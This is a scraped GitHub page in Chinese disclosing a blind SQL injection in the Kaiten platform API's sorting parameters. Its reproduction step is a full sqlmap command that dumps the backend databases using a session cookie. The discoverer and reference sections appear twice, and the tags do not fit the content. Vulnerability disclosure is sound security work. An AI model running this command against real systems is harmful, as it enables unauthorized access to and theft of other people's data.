4ybrick/CVE-2026-00000
GitHub: 4ybrick/CVE-2026-00000
该仓库披露了 Kaiten 协作平台 API 中一个 CVSS 9.9 严重级别的布尔盲注 SQL 注入漏洞(CVE-2026-00000)的细节与复现方法。
Stars: 0 | Forks: 0
# CVE-2026-00000
## 布尔盲注 SQL injection
**描述**:在生成动态 SQL 语句时,未进行必要的数据验证,且未使用参数化语句或存储过程。
**影响**:SQLi
**CVSSv3.1 向量**:AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (**9.9** **严重**)
**CWE**:CWE-89: SQL 命令中使用的特殊元素无效化不恰当('SQL Injection')
**受影响组件**:GET 参数 `order_by` & `order_direction`
**供应商**:[kaiten](https://kaiten.ru/)
## 受影响产品
- kaiten 版本:从 57.192.20 到 57.214.26
## 复现步骤:
1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
2. 输入 n(不将你的 cookie 与新 cookie 合并) -> C
## 发现者
- Danil Belov
## 参考资料
- https://nvd.nist.gov/vuln/detail/CVE-2026-00000
- https://bdu.fstec.ru/vul/2025-02933
- https://kaiten.ru/
## 发现者
- Danil Belov
## 参考资料
- https://nvd.nist.gov/vuln/detail/CVE-2026-00000
- https://bdu.fstec.ru/vul/2025-02933
- https://kaiten.ru/标签:CISA项目, CVE, 多线程, 数字签名, 测试用例, 漏洞披露